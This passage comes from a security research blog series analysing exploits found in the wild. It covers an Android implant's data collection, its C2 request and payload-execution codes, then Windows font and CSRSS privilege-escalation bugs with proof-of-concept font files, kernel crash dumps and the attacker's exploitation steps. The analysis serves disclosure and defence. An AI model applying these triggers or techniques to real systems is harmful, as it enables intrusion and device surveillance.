To get the device ID, subscriber ID, and MSISDN, the binary uses the service call shell command. To call a function from a service using this API, you need to know the code for the function. Basically, the code is the number that the function is listed in the AIDL file. This means it can change with each new Android release. The developers of this binary hardcoded the service code for each android SDK version from 8 (Froyo) through 29 (Android 10). For example, the getSubscriberId code in the iphonesubinfo service is 3 for Android SDK version 8-20, the code is 5 for SDK version 21, and the code is 7 for SDK versions 22-29.

The code also collects detailed networking information. For example, it collects the MAC address and IP address for each interface listed under the /sys/class/net/ directory.

Application Information

To collect information about the applications installed on the device, the binary will send all of the contents of /data/system/packages.xml to the C2 server. This XML file includes data about both the user-installed and the system-installed packages on the device.

Phone Location Information

To gather information about the physical location of the device, the binary runs dumpsys location in a shell. It sends the full output of this data back to the C2 server. The output of the dumpsys location command includes data such as the last known GPS locations.

Implant Status

The binary collects information about the status of the exploits and subsequent stages (including this one) to send back to the C2 server. Most of these values are obtained from the hash storage table. There are 22 value pairs that are sent back to the server. These values include things such as the installation time and the “repair count”, the build id, and the major and minor version numbers for the binary. The full set of data that is sent to the C2 server is available here.

Running Processes

The binary sends information about every single running process back to the C2 server. It will iterate through each directory under /proc/ and send back the following information for each process:

  • Name
  • Process ID (PID)
  • Parent’s PID
  • Groups that the process belongs to
  • Uid
  • Gid

Logging Information

As described in the Error Processing section, whenever the binary encounters an error, it creates an error message. The binary will send a maximum of 0x1F of these error messages back to the C2 server. It will also send a maximum of 0x1F “informational” messages back to the server. “Info” messages are similar to the error messages except that they are documenting a condition that is less severe than an error. These are distinctions that the developers included in their coding.

Constructing the Request

Once all of the “sets” of information are collected, they are compressed using the deflate function. The compressed “messages” each have the following compressedMessage structure. The messageCode is a type of identification code for the information that is contained in the message. It’s calculated by calculating the crc32 value for the 0x10 bytes at offset 0x1CD8 in the decrypted data block and then adding the “identification code”.

struct compressedMessage {

    uint compressedDataLength;

    uint uncompressedDataLength;

    uint messageCode;

    BYTE * dataPointer;

    BYTE[4096] data;


Once each of the messages, or sets of data, have been individually compressed into the compressedMessage struct, the byte order is swapped to change the endianness and then the data is all encrypted using AES256. The key from the decrypted data block is used and the IV is a set of 0x10 random bytes. The IV is prepended to the beginning of the encrypted message.

The data is sent to the server as a POST request. The full header is shown below.

POST /api2/v9/pass HTTP/1.1

 User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-G600FY Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.0 Chrome/38.0.2125.102 Mobile Safari/537.3

Host: REDACTED:443

Connection: keep-alive



Cookie: %s

The “Cookie” field is two values from the decrypted data block: sid and uid. The values for these two keys are base64 encoded values from the decrypted data block.

The body of the POST request is all of the data collected and compressed in the section above. This request is then sent to the C2 server via the SSL/TLS connection.

Parsing the Response

The response received back from the server is parsed. If the HTTP Response Code is not 200, it’s considered an error. The received data is first decrypted using AES256. The key used is the key that is included in the decrypted data block at offset 0x48A and the IV is sent back as the first 0x10 bytes of the response. After being decrypted, the byte order is swapped using bswap32 and the data is then decompressed using inflate. This inflated response body is an executable file or a series of commands.

C2 Server Cookies

The binary will also store and delete cookies for the C2 server domain and the exploit server domain. First, the binary will delete the cookie for the hostname of the exploit server that is the following name/value pair: session=<XXX>. This name/value is hardcoded into the decrypted data block within the binary. Then it will re-add that same cookie, but with an updated last accessed time and expire time.

Executing the Next Stage

As stated previously, stage 3’s role in the exploit chain is to check that the binary is not being analyzed and if not, collect detailed device data and send it to the C2 server to receive back the next stage of code and commands that should be executed. The detailed information that is sent back to the C2 server is likely used for high-fidelity targeting.

The developers of stage 3 purposefully built in a variety of different ways that the next stage of code can be executed: a series of commands passed to system or a shared library ELF file which can be executed by calling dlopen and dlsym, and more. This section will detail the different ways that the C2 server can instruct stage 3 to save and begin executing the next stage of code.

If the POST request to the C2 server is successful, the code will receive back either an executable file or a set of commands which it’ll “process”.  The response is parsed differently based on the “message code” in the header of the response. This “message code” is similar to what was described in the “Constructing the Request” section. It’s an identification code + the CRC32 of the 0x10 bytes at 0x25E30. When processing the response, the binary calculates the CRC32 of these bytes again and subtracts them from the message code. This value is then used to determine how to treat the contents of the response. The majority of the message codes distinguish different ways for the response to be saved to the device and then be executed.

There are a few functions that are commonly used by multiple message codes, so they are described here first.

func1 - Writes the response contents to files in both the /data/dalvik-cache/arm and /mnt directories.

This function does the following:

  1. Writes the buffer of the response to /data/dalvik-cache/arm/<file name keyed by 0x10 in hashtable>
  2. Gets a filename from mkstemp(“/mnt/XXXXXX”)
  3. Write the buffer of the response to a file with the name from step #2 + “abc” concatenated to the end: /mnt/XXXXXXabc
  4. Write a specific value from memory to the file with the name from step #2 with “xyz” concatenated to the end: /mnt/XXXXXXxyz. This specific value can be changed through the 2nd function that is exported by the stage 3 binary: d.

func2 - Fork child process and inject code using ptrace.

This function forks a new process where the child will call the function init from an ELF library, then the parent will inject the code from the response into the child process using ptrace. The ELF library that is opened with dlopen and then init is called on is named /system/bin/%016lx%016lx with both values being the address of the buffer pointer.

func3 - Writes the buffer of the reply contents to file and sets the permissions and SELinux attributes.

This function will write the buffer to either the provided file path in the third argument or it will generate a new file path.  If it’s generating a new temporary file name, the code will go down the following list of directory names beginning with /cache in the first directory that it can stat, it will create the temporary file using mkstemp(“%s/XXXXXX”).

  • /cache
  • /mnt/secure/asec
  • /mnt/secure/staging
  • /mnt/secure
  • /mnt/obb
  • /mnt/asec
  • /mnt
  • /storage

After the new file is created, the code sets the permissions on the file path to those supplied to the function as the fourth argument. Then it will set the SELinux attributes of the file to those passed in in the fifth argument.

The following section gives a simplified summary of how the response from the C2 server is handled based on the response’s message code:

  • 0x270F: Return 0.
  • 0x2710: The response is a shared library ELF (ET_DYN). Call func2 to fork a child process and inject the ELF using ptrace.
  • 0x2711: The response is a shared library ELF (ET_DYN). Save the file to a temp file on the device and then call dlopen and dlsym(“init”) on the ELF. A child process is then forked. The child process calls init.
  • 0x2712: The response is an ELF file. The file is written to a temporary file on the device. A child process is forked and that child process executes by calling execve on the file.
  • 0x2713: The response is an ELF file.  The file is written to a temporary file on the device using func3. A child process is forked and that child process executes it by calling system on the file.
  • 0x2714: It forks a child process and that child process calls system(<response contents>).
  • 0x2715: The response is executable code and is mmaped. Certain series of bytes are replaced by the address of dlopen, dlsym, and a function in the binary. Then the code is executed.
  • 0x4E20: If (D1_ENV == 0 && the code can NOT fstat /data/dalvik-cache/arm/[email protected]@boot.oat), go into an infinite sleep. Else, set a variable to 1.
  • 0x4E21: The response/buffer is an ELF with type ET_DYN (.so file). If D1_ENV environment variable is set, call func2, which spawns the child process and injects the buffer’s code into it using ptrace. If D1_ENV is not set, write the buffer to the dalvik-cache and /mnt directories through func1.
  • 0x4E22: This message increments the “uninstall_time” variable in the hashtable. For the value that is at key 0xA0 in the hashtable, it will increment it by the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E23: This message sets the “uninstall_time” variable in the hashtable. It will set the value at key 0xA0 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E25: Set the value at the key 0x100 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E26: If the third argument (filepath) to the function that is processing these responses is not NULL and it doesn’t previously exist, make the directory and then set the file permissions and SELinux attributes on the directory to the values passed in as the 4th and 5th arguments.
  • 0x4E27: Write the response buffer to a temporary file using func3.
  • 0x4E28: Call rmdir on a filepath.
  • 0x4E29: Call rmdir on a filepath, if it doesn’t exist delete uierrors.txt.
  • 0x4E2A: Copy an additional decrypted block to the end of the data that is the value for key 0xE0 in the hash table.
  • 0x4E2B: If (D1_ENV == 0 && we can fstat /data/dalvik-cache/arm/[email protected]@boot.oat), set certain variables to 1.
  • 0x4E2C: If the buffer is a 64-bit ELF and D1_ENV == 0, call func1 to write the buffer to the dalvik-cache and /mnt directories.


That concludes our analysis of Stage 3 in the Android exploit chain. We hypothesize that each Stage 2 (and thus Stage 3) includes different configuration variables that would allow the attackers to identify which delivered exploit chain is calling back to the C2 server. In addition, due to the detailed information sent to the C2 prior to stage 4 being returned to the device it seems unlikely that we would successfully determine the correct values to have a “legitimate” stage 4 returned to us.

It’s especially fascinating how complex and well-engineered this stage 3 code is when you consider that the attackers used all publicly known n-days in stage 2. The attackers used a Google Chrome 0-day in stage 1, public exploit for Android n-days in stage 2, and a mature, complex, and thoroughly designed and engineered stage 3. This leads us to believe that the actor likely has more device-specific 0-day exploits.

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 6: Windows Exploits.

In-the-Wild Series: Windows Exploits

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mateusz Jurczyk and Sergei Glazunov, Project Zero

In this post we'll discuss the exploits for vulnerabilities in Windows that have been used by the attacker to escape the Chrome renderer sandbox.

1. Font vulnerabilities on Windows ≤ 8.1 (CVE-2020-0938, CVE-2020-1020)


The Windows GDI interface supports an old format of fonts called Type 1, which was designed by Adobe around 1985 and was popular mostly in the 1990s and early 2000s. On Windows, these fonts are represented by a pair of .PFM (Printer Font Metric) and .PFB (Printer Font Binary) files, with the PFB being a mixture of a textual PostScript syntax and binary-encoded CharString instructions describing the shapes of glyphs. GDI also supports a little-known extension of Type 1 fonts called "Multiple Master Fonts", a feature that was never very popular, but adds significant complexity to the text rasterization logic and was historically a source of many software bugs (e.g. one in the blend operator).

On Windows 8.1 and earlier versions, the parsing of these fonts takes place in a kernel driver called atmfd.dll (accessible through win32k.sys graphical syscalls), and thus it is an attack surface that may be exploited for privilege escalation. On Windows 10, the code was moved to a restricted fontdrvhost.exe user-mode process and is a significantly less attractive target. This is why the exploit found in the wild had a separate sandbox escape path dedicated to Windows 10 (see section 2. "CVE-2020-1027"). Oddly enough, the font exploit had explicit support for Windows 8 and 8.1, even though these platforms offer the win32k disable policy that Chrome uses, so the affected code shouldn't be reachable from the renderer processes. The reason for this is not clear, and possible explanations include the same privesc exploit being used in attacks against different client software (not limited to Chrome), or it being developed before the win32k lockdown was enabled in Chrome by default (pre-2015).

Nevertheless, the following analysis is based on Windows 8.1 64-bit with the March 2020 patch, the latest affected version at the time of the exploit discovery.

Font bug #1

The first vulnerability was present in the processing of the /VToHOrigin PostScript object. I suspect that this object had only been defined in one of the early drafts of the Multiple Master extension, as it is very poorly documented today and hard to find any official information on. The "VToHOrigin" keyword handler function is found at offset 0x220B0 of atmfd.dll, and based on the fontdrvhost.exe public symbols, we know that its name is ParseBlendVToHOrigin. To understand the bug, let's have a look at the following pseudo code of the routine, with irrelevant parts edited out for clarity:

int ParseBlendVToHOrigin(void *arg) {

  Fixed16_16 *ptrs[2];

  Fixed16_16 values[2];

  for (int i = 0; i < g_font->numMasters; i++) {

    ptrs[i] = &g_font->SomeArray[arg->SomeField + i];


  for (int i = 0; i < 2; i++) {

    int values_read = GetOpenFixedArray(values, g_font->numMasters);

    if (values_read != g_font->numMasters) {

      return -8;


    for (int num = 0; num < g_font->numMasters; num++) {

      ptrs[num][i] = values[num];



  return 0;


In summary, the function initializes numMasters pointers on the stack, then reads the same-sized array of fixed point values from the input stream, and writes each of them to the corresponding pointer. The root cause of the problem was that numMasters might be set to any value between 0–16, but both the ptrs and values arrays were only 2 items long. This meant that with 3 or more masters specified in the font, accesses to ptrs[2] and values[2] and larger indexes corrupted memory on the stack. On the x64 build that I analyzed, the stack frame of the function was laid out as follows:


RSP + 0x30


RSP + 0x38


RSP + 0x40

saved RDI

RSP + 0x48

return address

RSP + 0x50

values[0 .. 1]

RSP + 0x58

saved RBX

RSP + 0x60

saved RSI


The green rows indicate the user-controlled local arrays, and the red ones mark internal control flow data that could be corrupted. Interestingly, the two arrays were separated by the saved RDI register and the return address, which was likely caused by a compiler optimization and the short length of values. A direct overflow of the return address is not very useful here, as it is always overwritten with a non-executable address. However, if we ignore it for now and continue with the stack corruption, the next pointer at ptrs[4] overlaps with controlled data in values[0] and values[1], and the code uses it to write the values[4] integer there. This is a classic write-what-where condition in the kernel.

After the first controlled write of a 32-bit value, the next iteration of the loop tries to write values[5] to an address made of ((values[3]<<32)|values[2]). This second write-what-where is what gives the attacker a way to safely escape the function. At this point, the return address is inevitably corrupted, and the only way to exit without crashing the kernel is through an access to invalid ring-3 memory. Such an exception is intercepted by a generic catch-all handler active throughout the font parsing performed by atmfd, and it safely returns execution back to the user-mode caller. This makes the vulnerability very reliable in exploitation, as the write-what-where primitive is quickly followed by a clean exit, without any undesired side effects taking place in between.

A proof-of-concept test case is easily crafted by taking any existing Type 1 font, and recompiling it (e.g. with the detype1 + type1 utilities as part of AFDKO) to add two extra objects to the .PFB file. A minimal sample in textual form is shown below:

~%!PS-AdobeFont-1.0: Test 001.001

dict begin

/FontInfo begin

/FullName (Test) def


/FontType 1 def

/FontMatrix [0.001 0 0 0.001 0 0] def

/WeightVector [0 0 0 0 0] def

/Private begin

/Blend begin

/VToHOrigin[[16705.25490 -0.00001 0 0 16962.25882]]



currentdict end

%currentfile eexec /Private begin

/CharStrings 1 begin

/.notdef ## -| { endchar } |-



mark %currentfile closefile


The first highlighted line sets numMasters to 5, and the second one triggers a write of 0x42424242 (represented as 16962.25882) to 0xffffffff41414141 (16705.25490 and -0.00001). A crash can be reproduced by making sure that the PFB and PFM files are in the same directory, and opening the PFM file in the default Windows Font Viewer program. You should then be able to observe the following bugcheck in the kernel debugger:


Invalid system memory was referenced.  This cannot be protected by try-except.

Typically the address is just plain bad or it is pointing at freed memory.


Arg1: ffffffff41414141, memory referenced.

Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.

Arg3: fffff96000a86144, If non-zero, the instruction address which referenced the bad memory


Arg4: 0000000000000002, (reserved)


TRAP_FRAME:  ffffd000415eefa0 -- (.trap 0xffffd000415eefa0)

NOTE: The trap frame does not contain all registers.

Some register values may be zeroed or incorrect.

rax=0000000042424242 rbx=0000000000000000 rcx=ffffffff41414141

rdx=0000000000000005 rsi=0000000000000000 rdi=0000000000000000

rip=fffff96000a86144 rsp=ffffd000415ef130 rbp=0000000000000000

 r8=0000000000000000  r9=000000000000000e r10=0000000000000000

r11=00000000fffffffb r12=0000000000000000 r13=0000000000000000

r14=0000000000000000 r15=0000000000000000

iopl=0         nv up ei pl nz na po cy


fffff96000a86144 890499          mov     dword ptr [rcx+rbx*4],eax ds:ffffffff41414141=????????

Resetting default scope

Font bug #2

The second issue was found in the processing of the /BlendDesignPositions object, which is defined in the Adobe Font Metrics File Format Specification document from 1998. Its handler is located at offset 0x21608 of atmfd.dll, and again using the fontdrvhost.exe symbols, we can learn that its internal name is SetBlendDesignPositions. Let's analyze the C-like pseudo code:

int SetBlendDesignPositions(void *arg) {

  int num_master;

  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {

    if (GetToken() != TOKEN_OPEN) {



    int values_read = GetOpenFixedArray(&values[num_master], 15);




  for (int i = 0; i < num_master; i++) {

    procs->BlendDesignPositions(i, &values[i]);


  return 0;


The bug was simple. In the first for() loop, there was no upper bound enforced on the number of iterations, so one could read data into the arrays at &values[0], &values[1], ..., and then out-of-bounds at &values[16], &values[17] and so on. Most importantly, the GetOpenFixedArray function may read between 0 and 15 fixed point 32-bit values depending on the input file, so one could choose to write little or no data at specific offsets. This created a powerful non-continuous stack corruption primitive, which made it possible to easily redirect execution to a specific address or build a ROP chain directly on the stack. For example, the SetBlendDesignPositions function itself was compiled with a /GS cookie, but it was possible to overwrite another return address higher up the call chain to hijack the control flow.

To trigger the bug, it is sufficient to load a Type 1 font that includes a specially crafted /BlendDesignPositions object:

~%!PS-AdobeFont-1.0: Test 001.001

dict begin

/FontInfo begin

/FullName (Test) def


/FontType 1 def

/FontMatrix [0.001 0 0 0.001 0 0] def

/BlendDesignPositions [[][][][][][][][][][][][][][][][][][][][][][][0 0 0 0 16705.25490 -0.00001]]

/Private begin

/Blend begin



currentdict end

%currentfile eexec /Private begin

/CharStrings 1 begin

/.notdef ## -| { endchar } |-



mark %currentfile closefile


In the highlighted line, we first specify 22 empty arrays that don't corrupt any memory and only shift the index up to &values[22]. Then, we write the 32-bit values of 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x41414141, 0xfffffff to values[22][0..5]. On a vulnerable Windows 8.1, this coincides with the position of an unprotected return address higher on the stack. When such a font is loaded through GDI, the following kernel bugcheck is generated:


Invalid system memory was referenced.  This cannot be protected by try-except.

Typically the address is just plain bad or it is pointing at freed memory.


Arg1: ffffffff41414141, memory referenced.

Arg2: 0000000000000008, value 0 = read operation, 1 = write operation.

Arg3: ffffffff41414141, If non-zero, the instruction address which referenced the bad memory


Arg4: 0000000000000002, (reserved)


TRAP_FRAME:  ffffd0003e7ca140 -- (.trap 0xffffd0003e7ca140)

NOTE: The trap frame does not contain all registers.

Some register values may be zeroed or incorrect.

rax=0000000000000000 rbx=0000000000000000 rcx=aae4a99ec7250000

rdx=0000000000000027 rsi=0000000000000000 rdi=0000000000000000

rip=ffffffff41414141 rsp=ffffd0003e7ca2d0 rbp=0000000000000002

 r8=0000000000000618  r9=0000000000000024 r10=fffff90000002000

r11=ffffd0003e7ca270 r12=0000000000000000 r13=0000000000000000

r14=0000000000000000 r15=0000000000000000

iopl=0         nv up ei ng nz na po nc

ffffffff`41414141 ??              ???

Resetting default scope


According to our analysis, the font exploit supported the following Windows versions:

  • Windows 8.1 (NT 6.3)
  • Windows 8 (NT 6.2)
  • Windows 7 (NT 6.1)
  • Windows Vista (NT 6.0)

When run on systems up to and including Windows 8, the exploit started off by triggering the write-what-where condition (bug #1) twice, to set up a minimalistic 8-byte bootstrap code at a fixed address around 0xfffff90000000000. This location corresponds to the win32k.sys session space, and is mapped as RWX in these old versions of Windows, which means that KASLR didn't have to be bypassed as part of the attack. As the next step, the exploit used bug #2 to redirect execution to the first stage payload. Each of these actions was performed through a single NtGdiAddRemoteFontToDC system call, which can conveniently load Type 1 fonts from memory (as previously discussed here), and was enough to reach both vulnerabilities. In total, the privilege escalation process took only three syscalls.

Things get more complicated on Windows 8.1, where the session space is no longer executable:

0: kd> !pte fffff90000000000

PXE at FFFFF6FB7DBEDF90          

contains 0000000115879863    

pfn 115879    ---DA--KWEV    


contains 0000000115878863

pfn 115878    ---DA--KWEV

PDE at FFFFF6FB7E400000

contains 0000000115877863

pfn 115877    ---DA--KWEV

PTE at FFFFF6FC80000000

contains 8000000115976863

pfn 115976    ---DA--KW-V

As a result, the memory cannot be used so trivially as a staging area for the controlled kernel-mode code, but with a write-what-where primitive, there are many ways to work around it. In this specific exploit, the author switched from the session space to another page with a constant address – the shared user data region at 0xfffff78000000000. Notably, that page is not executable by default either, but thanks to the fixed location of page tables in Windows 8.1, it can be made executable with a single 32-bit write of value 0x0 to address 0xfffff6fbc0000004, which stores the relevant page table entry. This is what the exploit did – it disabled the NX bit in PTE, then wrote a 192-byte payload to the shared user page and executed it. This code path also performed some extra clean up, first by restoring the NX bit and then erasing traces of the attack from memory.

Once kernel execution reached the initial shellcode, a series of intermediary steps followed, each of them unpacking and jumping to a next, longer stage. Some code was encoded in the /FontMatrix PostScript object, some in the /FontBBox object, and even more directly in the font stream data. At this point, the exploit resolved the addresses of several exported symbols in ntoskrnl.exe, allocated RWX memory with a ExAllocatePoolWithTag(NonPagedPool) call, copied the final payload from the user-mode address space, and executed it. This is where we'll conclude our analysis, as the mechanics of the ring-0 shellcode are beyond the scope of this post.

The fixes

We reported the issues to Microsoft on March 17. Initially, they were subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. A security advisory was published by Microsoft on March 23, urging users to apply workarounds such as disabling the atmfd.dll font driver to mitigate the vulnerabilities. The fixes came out on April 14 as part of that month's Patch Tuesday, 28 days after our report.

Since both bugs were simple in nature, their fixes were equally simple too. In the ParseBlendVToHOrigin function, both ptrs and values arrays were extended to 16 entries, and an extra sanity check was added to ensure that numMasters wouldn't exceed 16:

int ParseBlendVToHOrigin(void *arg) {

  Fixed16_16 *ptrs[16];

  Fixed16_16 values[16];

  if (g_font->numMasters > 0x10) {

    return -4;




In the SetBlendDesignPositions function, an extra bounds check was introduced to limit the number of loop iterations to 16:

int SetBlendDesignPositions(void *arg) {

  int num_master;

  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {

    if (GetToken() != TOKEN_OPEN) {



    if (num_master >= 16) {

      return -4;


    int values_read = GetOpenFixedArray(&values[num_master], 15);





2. CSRSS issue on Windows 10 (CVE-2020-1027)


The Client/Server Runtime Subsystem, or csrss.exe, is the user-mode part of the Win32 subsystem. Before Windows NT 4.0, CSRSS was in charge of the entire graphical user interface; nowadays, it implements tasks related to, for example, process and thread management.

csrss.exe is a user-mode process that runs with SYSTEM privileges. By default, every Win32 application opens a connection to CSRSS at startup. A significant number of API functions in Windows rely on the existence of the connection, so even the most restrictive application sandboxes, including the Chromium sandbox, can’t lock it down without causing stability problems. This makes CSRSS an appealing vector for privilege escalation attacks.

The communication with the subsystem server is performed via the ALPC mechanism, and the OS provides the high-level CSR API on top of it. The primary API function is called ntdll!CsrClientCallServer. It invokes a selected CSRSS routine and (optionally) receives the result:

NTSTATUS CsrClientCallServer(

    PCSR_API_MSG ApiMessage, 

    PVOID CaptureBuffer, 

    ULONG ApiNumber, 

    LONG DataLength);

The ApiNumber parameter determines which routine will be executed. ApiMessage is a pointer to a corresponding message object of size DataLength, and CaptureBuffer is a pointer to a buffer in a special shared memory region created during the connection initialization. CSRSS employs shared memory to transfer large and/or dynamically-sized structures, such as strings. ApiMessage can contain pointers to objects inside CaptureBuffer, and the API takes care of translating the pointers between the client and server virtual address spaces.

The reader can refer to this series of posts for a detailed description of the CSRSS internals.

One of CSRSS modules, sxssrv.dll, implements the support for side-by-side assemblies. Side-by-side assembly (SxS) technology is a standard for executable files that is primarily aimed at alleviating problems, such as version conflicts, arising from the use of dynamic-link libraries. In SxS, Windows stores multiple versions of a DLL and loads them on demand. An application can include a side-by-side manifest, i.e. a special XML document, to specify its exact dependencies. An example of an application manifest is provided below:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">

  <assemblyIdentity type="win32" name="Microsoft.Windows.MySampleApp"

      version="" processorArchitecture="x86"/>



      <assemblyIdentity type="win32" name="Microsoft.Tools.MyPrivateDll"

          version="" processorArchitecture="x86"/>




The bug

The vulnerability in question has been discovered in the routine sxssrv! BaseSrvSxsCreateActivationContext, which has the API number 0x10017. The function parses an application manifest and all its (potentially transitive) dependencies into a binary data structure called an activation context, and the current activation context determines the objects and libraries that need to be redirected to a specific implementation.

The relevant ApiMessage object contains several UNICODE_STRING parameters, such as the application name and assembly store path. UNICODE_STRING is a well-known mutable string structure with a separate field to keep the capacity (MaximumLength) of the backing store:

typedef struct _UNICODE_STRING {

  USHORT Length;

  USHORT MaximumLength;

  PWSTR  Buffer;


BaseSrvSxsCreateActivationContext starts with validating the string parameters:

for (i = 0; i < 6; ++i) {

  if (StringField = StringFields[i]) {

    Length = StringField->Length;

    if (Length && !StringField->Buffer ||

        Length > StringField->MaximumLength || Length & 1)

      return 0xC000000D;

    if (StringField->Buffer) {

      if (!CsrValidateMessageBuffer(ApiMessage, &StringField->Buffer,

                                    Length + 2, 1)) {

        DbgPrintEx(0x33, 0,

                   "SXS: Validation of message buffer 0x%lx failed.\n"

                   " Message:%p\n"

                   " String %p{Length:0x%x, MaximumLength:0x%x, Buffer:%p}\n",

                   i, ApiMessage, StringField, StringField->Length,

                   StringField->MaximumLength, StringField->Buffer);

        return 0xC000000D;


      CharCount = StringField->Length >> 1;

      if (StringField->Buffer[CharCount] &&

          StringField->Buffer[CharCount - 1])

        return 0xC000000D;




CsrValidateMessageBuffer is declared as follows:

BOOLEAN CsrValidateMessageBuffer(

    PCSR_API_MSG ApiMessage,

    PVOID* Buffer,

    ULONG ElementCount,

    ULONG ElementSize);

This function verifies that 1) the *Buffer pointer references data inside the associated capture buffer, 2) the expression *Buffer + ElementCount * ElementSize doesn’t cause an integer overflow, and 3) it doesn’t go past the end of the capture buffer.

As the reader can see, the buffer size for the validation is calculated based on the Length field rather than MaximumLength. This would be safe if the strings were only used as input parameters. Unfortunately, the string at offset 0x120 from the beginning of ApiMessage (we’ll be calling it ApplicationName) can also be re-used as an output parameter. The affected call stack looks as follows:









When BaseSrvSxsCreateActivationContextFromStructEx is called, it initializes an instance of the SXS_GENERATE_ACTIVATION_CONTEXT_PARAMETERS structure with the pointer to ApplicationName’s buffer and the unaudited MaximumLength value as the buffer size:

BufferCapacity = CreateCtxParams->ApplicationName.MaximumLength;

if (BufferCapacity) {

  GenActCtxParams.ApplicationNameCapacity = BufferCapacity >> 1;

  GenActCtxParams.ApplicationNameBuffer =


} else {

  GenActCtxParams.ApplicationNameCapacity = 60;

  StringBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 120);

  if (!StringBuffer) {

    Status = 0xC0000017;

    goto error;


  GenActCtxParams.ApplicationNameBuffer = StringBuffer;


Then sxs!SxsGenerateActivationContext passes those values to ACTCTXGENCTX:

Context = (_ACTCTXGENCTX *)HeapAlloc(g_hHeap, 0, 0x10D8);

if (Context) {


} else {



  goto error;


if (GenActCtxParams->ApplicationNameBuffer &&

    GenActCtxParams->ApplicationNameCapacity) {

  Context->ApplicationNameBuffer = GenActCtxParams->ApplicationNameBuffer;

  Context->ApplicationNameCapacity = GenActCtxParams->ApplicationNameCapacity;


Ultimately, sxs!CNodeFactory::

XMLParser_Element_doc_assembly_assemblyIdentity calls memcpy that can go past the end of the capture buffer:

IdentityNameBuffer = 0;

IdentityNameLength = 0;


if (!SxspGetAssemblyIdentityAttributeValue(0, v11, &s_IdentityAttribute_name,


                                           &IdentityNameLength)) {

  CallSiteInfo = off_16506FA20;

  goto error;


if (IdentityNameLength &&

    IdentityNameLength < Context->ApplicationNameCapacity) {

  memcpy(Context->ApplicationNameBuffer, IdentityNameBuffer,

         2 * IdentityNameLength + 2);

  Context->ApplicationNameLength = IdentityNameLength;

} else {

  *Context->ApplicationNameBuffer = 0;

  Context->ApplicationNameLength = 0;


The source data for the memcpy call comes from the name parameter of the main assemblyIdentity node in the manifest.


Even though the vulnerability was present in older versions of Windows, the exploit only targets Windows 10. All major builds up to 18363 are supported.

As a result of the vulnerability, the attacker can call memcpy with fully controlled contents and size. This is one of the best initial primitives a memory corruption bug can provide, but there’s one potential issue. So far it seems like the bug allows the attacker to write data either past the end of the capture buffer in a shared memory region, which they can already write to from the sandboxed process, or past the end of the shared region, in which case it’s quite difficult to reliably make a “useful” allocation right next to the region. Luckily for the attacker, the vulnerable code actually operates on a copy of the original capture buffer, which is made by csrsrv!CsrCaptureArguments to avoid potential issues caused by concurrent modification of the buffer contents, and the copy is allocated in the regular heap.

The logical first step of the exploit would be to leak some data needed for an ASLR bypass. However, the following design quirks in Windows and CSRSS make it unnecessary:

  • Windows randomizes module addresses once per boot, and csrss.exe is a regular user-mode process. This means that the attacker can use modules loaded in both csrss.exe and the compromised sandboxed process, for example, ntdll.dll, for code-reuse attacks.

  • csrss.exe provides client processes with its virtual address of the shared region during initialization so they can adjust pointers for API calls. The offset between the “local” and “remote” addresses is stored in ntdll!CsrPortMemoryRemoteDelta. Thus, the attacker can store, e.g., fake structures needed for the attack in the shared mapping at a predictable address.

The exploit also has to bypass another security feature, Microsoft’s Control Flow Guard, which makes it significantly more difficult to jump into a code reuse gadget chain via an indirect function call. The attacker has decided to exploit the CFG’s inability to protect return addresses on the stack to gain control of the instruction pointer. The complete algorithm looks as follows:

1. Groom the heap. The exploit makes a preliminary CreateActivationContext call with a specially crafted manifest needed to massage the heap into a predictable state. It contains an XML node with numerous attributes in the form aa:aabN="BB...BB”. The manifest for the second call, which actually triggers the vulnerability, contains similar but different-sized attributes.

2. Implement write-what-where. The buffer overflow is used to overwrite the contents of XMLParser::_MY_XML_NODE_INFO nodes. _MY_XML_NODE_INFO may optionally contain a pointer to an internal character buffer. During subsequent parsing, if the current element is a numeric character entity (i.e. a string in the form &#x01234;), the parser calls XMLParser::CopyText to store the decoded character in the internal buffer of the currently active _MY_XML_NODE_INFO node. Therefore, by overwriting multiple nodes, the exploit can write data of any size to a controlled address.

3. Overwrite the loaded module list. The primitive gained in the previous step is used to modify the pointer to the loaded module list located in the PEB_LDR_DATA structure inside ntdll.dll, which is possible because the attacker has already obtained the base address of the library from the sandboxed process. The fake module list consists of numerous LDR_MODULE entries and is stored in the shared memory region. The unofficial definition of the structure is shown below:

typedef struct _LDR_MODULE {

  LIST_ENTRY InLoadOrderModuleList;

  LIST_ENTRY InMemoryOrderModuleList;

  LIST_ENTRY InInitializationOrderModuleList;

  PVOID BaseAddress;

  PVOID EntryPoint;

  ULONG SizeOfImage;



  ULONG Flags;

  SHORT LoadCount;

  SHORT TlsIndex;

  LIST_ENTRY HashTableEntry;

  ULONG TimeDateStamp;


When a new thread is created, the ntdll!LdrpInitializeThread function will follow the module list and, provided that the necessary flags are set, run the function referenced by the EntryPoint member with BaseAddress as the first argument. The EntryPoint call is still protected by the CFG, so the exploit can’t jump to a ROP chain yet. However, this gives the attacker the ability to execute an arbitrary sequence of one-argument function calls.

4. Launch a new thread. The exploit deliberately causes a null pointer dereference. The exception handler in csrss.exe catches it and creates an error-reporting task in a new thread via csrsrv!CsrReportToWerSvc.

5. Restore the module list. Once the execution reaches the fake module list processing, it’s important to restore PEB_LDR_DATA’s original state to avoid crashes in other threads. The attacker has discovered that a pair of ntdll!RtlPopFrame and ntdll!RtlPushFrame calls can be used to copy an 8-byte value from one given address to another. The fake module list starts with such a pair to fix the loader data structure.

